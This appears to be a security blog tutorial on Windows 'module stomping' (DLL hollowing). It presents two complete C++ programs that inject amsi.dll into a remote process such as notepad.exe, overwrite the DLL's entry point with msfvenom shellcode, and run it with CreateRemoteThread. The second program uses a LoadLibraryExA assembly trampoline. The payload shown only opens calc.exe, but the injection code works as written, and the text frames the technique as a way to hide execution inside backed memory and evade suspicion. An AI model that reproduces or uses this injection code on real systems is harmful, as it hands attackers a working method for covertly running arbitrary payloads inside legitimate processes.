Module stomping is a form of DLL injection. However, we inject a legitimate DLL into a remote process then overwrite the DLL’s code. The benefit of this technique is our shellcode will be executed from a region of backed memory (i.e a memory region within the range of a loaded module). Module stomping is sometimes referred to as DLL hollowing.
There are a couple of ways to carry this out. First, let’s look at performing module stomping using LoadLibraryA.
LoadLibraryA Module Stomping
The following steps need to occur;
- Get a handle to the remote process using OpenProcess
- Allocate memory with VirtualAlloc, and write out the name of the legitimate DLL we want to load using WriteProcessMemory
- Use CreateRemoteThread to execute LoadLibraryA, using a pointer to our DLL name as it’s parameter
- Retrieve the DLL entry point for the module we just loaded.
- Use WriteProcessMemory to overwrite the DLL entry point with our shellcode
- Use CreateRemoteThread again with the DLL entry point
The below code implements these steps.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 | #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <iostream> #include <TlHelp32.h> #include <Psapi.h> #include <tchar.h> using namespace std; DWORD_PTR GetRemoteDllLoadAddress( HANDLE hProcess, const TCHAR * dllName) { if (hProcess == NULL) { std::cerr << "Invalid process handle." << std::endl; return 0; } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess)); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot." << std::endl; return 0; } MODULEENTRY32 me32; me32.dwSize = sizeof (MODULEENTRY32); DWORD_PTR loadAddress = 0; if (Module32First(hSnapshot, &me32)) { do { if (_tcsicmp(me32.szModule, dllName) == 0) { loadAddress = ( DWORD_PTR )me32.modBaseAddr; break ; } } while (Module32Next(hSnapshot, &me32)); } CloseHandle(hSnapshot); return loadAddress; } DWORD_PTR GetRemoteDllEntryPoint( HANDLE hProcess, DWORD_PTR loadAddress) { if (hProcess == NULL || loadAddress == 0) { std::cerr << "Invalid process handle or load address." << std::endl; return 0; } // Read DOS header from remote process IMAGE_DOS_HEADER dosHeader; SIZE_T bytesRead; if (!ReadProcessMemory(hProcess, ( LPCVOID )loadAddress, &dosHeader, sizeof (IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof (IMAGE_DOS_HEADER)) { std::cerr << "Failed to read DOS header." << std::endl; return 0; } // Validate DOS header if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { std::cerr << "Invalid DOS header." << std::endl; return 0; } // Read NT headers from remote process IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(hProcess, ( LPCVOID )(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof (IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof (IMAGE_NT_HEADERS)) { std::cerr << "Failed to read NT headers." << std::endl; return 0; } // Validate NT headers if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) { std::cerr << "Invalid NT headers." << std::endl; return 0; } // Calculate and return entry point address return ( DWORD_PTR )(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint); } int main( int argc, char * argv[]) { char sampleDLL[] = "C:\\windows\\system32\\amsi.dll" ; HANDLE process_handle; //Get a handle to our remote process process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD ( atoi (argv[1]))); // Allocate memory in the remote process LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); // Write our DLL name to the remote process WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof (sampleDLL), NULL); //Retrieve the memory address of LoadLibraryA function HMODULE k32_handle = GetModuleHandle( L"Kernel32" ); VOID * load_library = GetProcAddress(k32_handle, "LoadLibraryA" ); //Execute the DLL in a new remote thread HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)load_library, buffer, 0, NULL); std::cout << "DLL Injected! Press ENTER to execute\n" ; getchar (); const TCHAR * dllName = _T( "amsi.dll" ); // Specify the name of the DLL DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName); if (dllLoadAddress != 0) { std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl; } else { std::cerr << "Failed to find DLL load address." << std::endl; } DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress); if (entryPointAddress != 0) { std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl; } else { std::cerr << "Failed to retrieve entry point address." << std::endl; } // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; WriteProcessMemory(process_handle, reinterpret_cast < LPVOID >(entryPointAddress), ( LPCVOID )shellcode, sizeof (shellcode), NULL); // execute shellcode from inside the benign DLL CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL); CloseHandle(process_handle); std::cout << "Execution complete\n" ; return 0; } |
It’s worth noting that the loaded DLL may be Control Flow Guard enabled, which effectively prevents us from executing from arbitrary locations in the target DLL. However, the entry point will always be executable .
LoadLibraryExA Module Stomping
In the above example, we use LoadLibraryA. This does work, however every time the DLL is loaded, or unloaded our code will execute. This may not be ideal and lead to instability in the target process. To get around this, we can use LoadLibraryExA.
1 2 3 4 5 | HMODULE LoadLibraryExA( [in] LPCSTR lpLibFileName, HANDLE hFile, [in] DWORD dwFlags ); |
The dwFlags option supports the value DONT_RESOLVE_DLL_REFERENCES, which appears to do what we want;
If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.
https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa
The problem with using LoadLibraryExA, is CreateRemoteThread only allows us to specify one argument to the target process, and we need to supply three. In order to do this, the following approach is taken;
- Lookup the LoadLibraryExA Address in the remote process.
- Allocate some memory in the remote process, and write a ASM stub code to set the additional function parameters we require
- Call CreateRemoteThread, with a pointer to our ASM stub.
Our ASM stub will look something like this;
1 2 3 4 | movabs rax, 0x000000000000000 - Replaced with LoadLibraryExA Address mov r8, 0x1 - ARG2 xor rdx, rdx - ARG1 jmp rax |
When we call this stub using CreateRemoteThread, we can specifiy a single parameter (ARG0) that will end up in the RCX register. This will be a pointer to the DLL’s entrypoint.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 | #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <iostream> #include <TlHelp32.h> #include <Psapi.h> #include <tchar.h> using namespace std; DWORD_PTR GetRemoteDllLoadAddress( HANDLE hProcess, const TCHAR * dllName) { if (hProcess == NULL) { std::cerr << "Invalid process handle." << std::endl; return 0; } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess)); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot." << std::endl; return 0; } MODULEENTRY32 me32; me32.dwSize = sizeof (MODULEENTRY32); DWORD_PTR loadAddress = 0; if (Module32First(hSnapshot, &me32)) { do { if (_tcsicmp(me32.szModule, dllName) == 0) { loadAddress = ( DWORD_PTR )me32.modBaseAddr; break ; } } while (Module32Next(hSnapshot, &me32)); } CloseHandle(hSnapshot); return loadAddress; } DWORD_PTR GetRemoteDllEntryPoint( HANDLE hProcess, DWORD_PTR loadAddress) { if (hProcess == NULL || loadAddress == 0) { std::cerr << "Invalid process handle or load address." << std::endl; return 0; } // Read DOS header from remote process IMAGE_DOS_HEADER dosHeader; SIZE_T bytesRead; if (!ReadProcessMemory(hProcess, ( LPCVOID )loadAddress, &dosHeader, sizeof (IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof (IMAGE_DOS_HEADER)) { std::cerr << "Failed to read DOS header." << std::endl; return 0; } // Validate DOS header if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { std::cerr << "Invalid DOS header." << std::endl; return 0; } // Read NT headers from remote process IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(hProcess, ( LPCVOID )(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof (IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof (IMAGE_NT_HEADERS)) { std::cerr << "Failed to read NT headers." << std::endl; return 0; } // Validate NT headers if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) { std::cerr << "Invalid NT headers." << std::endl; return 0; } // Calculate and return entry point address return ( DWORD_PTR )(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint); } LPVOID loadlibrary_gadget( void * ptr_load_libraryex, HANDLE process_handle) { //Add the LoadLibraryExA instruction to our trampoline // 48 b8 00 00 00 00 00 movabs rax, 0x000000000000000 - LoadLibraryExA Address // 7 : 00 00 00 // a : 49 c7 c0 01 00 00 00 mov r8, 0x1 - ARG2 // 11 : 48 31 d2 xor rdx, rdx - ARG1 // 14 : ff e0 jmp rax uint8_t load_libary_ex_instructions[] = {0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0xFF, 0xE0}; memcpy (&load_libary_ex_instructions[2], &ptr_load_libraryex, sizeof (ptr_load_libraryex)); // Allocate memory in remote process and write to it LPVOID gadget_buffer = VirtualAllocEx(process_handle, NULL, sizeof (load_libary_ex_instructions), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(process_handle, gadget_buffer, load_libary_ex_instructions, sizeof (load_libary_ex_instructions), NULL); return gadget_buffer; } DWORD GetProcessIdByName( const TCHAR * processName) { PROCESSENTRY32 processEntry; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return 0; // Unable to create snapshot } processEntry.dwSize = sizeof (PROCESSENTRY32); if (!Process32First(hSnapshot, &processEntry)) { CloseHandle(hSnapshot); return 0; // Unable to get the first process } do { if (_tcsicmp(processEntry.szExeFile, processName) == 0) { CloseHandle(hSnapshot); return processEntry.th32ProcessID; // Found the process, return its PID } } while (Process32Next(hSnapshot, &processEntry)); CloseHandle(hSnapshot); return 0; // Process not found } int main( int argc, char * argv[]) { HANDLE process_handle; //Get a handle to our remote process const TCHAR * processName = _T( "notepad.exe" ); DWORD pid = GetProcessIdByName(processName); process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); // Allocate memory in the remote process char sampleDLL[] = "C:\\windows\\system32\\amsi.dll" ; LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); // Write our DLL to the remote process WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof (sampleDLL), NULL); //Retrieve the memory address of LoadLibraryA function HMODULE k32_handle = GetModuleHandle( L"Kernel32" ); VOID * load_library = GetProcAddress(k32_handle, "LoadLibraryExA" ); // Get a pointer to our LoadLibraryExA gadget std::cout << "LoadLibraryExA address " << ": 0x" << std::hex << load_library << std::endl; LPVOID gadget_buffer = loadlibrary_gadget(load_library, process_handle); std::cout << "Gadget buffer " << ": 0x" << std::hex << gadget_buffer << std::endl; HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)gadget_buffer, buffer, 0, NULL); std::cout << "DLL Injected! Press ENTER to execute\n" ; getchar (); const TCHAR * dllName = _T( "amsi.dll" ); // Specify the name of the DLL DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName); if (dllLoadAddress != 0) { std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl; } else { std::cerr << "Failed to find DLL load address." << std::endl; } DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress); if (entryPointAddress != 0) { std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl; } else { std::cerr << "Failed to retrieve entry point address." << std::endl; } // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; WriteProcessMemory(process_handle, reinterpret_cast < LPVOID >(entryPointAddress), ( LPCVOID )shellcode, sizeof (shellcode), NULL); // execute shellcode from inside the benign DLL CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL); CloseHandle(process_handle); std::cout << "Execution complete\n" ; return 0; } |
In Conclusion
LoadLibraryExA module stomping does prevent the issue of the payload being executed multiple times, however it requires using VirtualAlloc to allocate unbacked memory in the remote process which in itself may be suspicious. An alternative may be implementing a mutex in the payload to ensure only one instance executes at a time.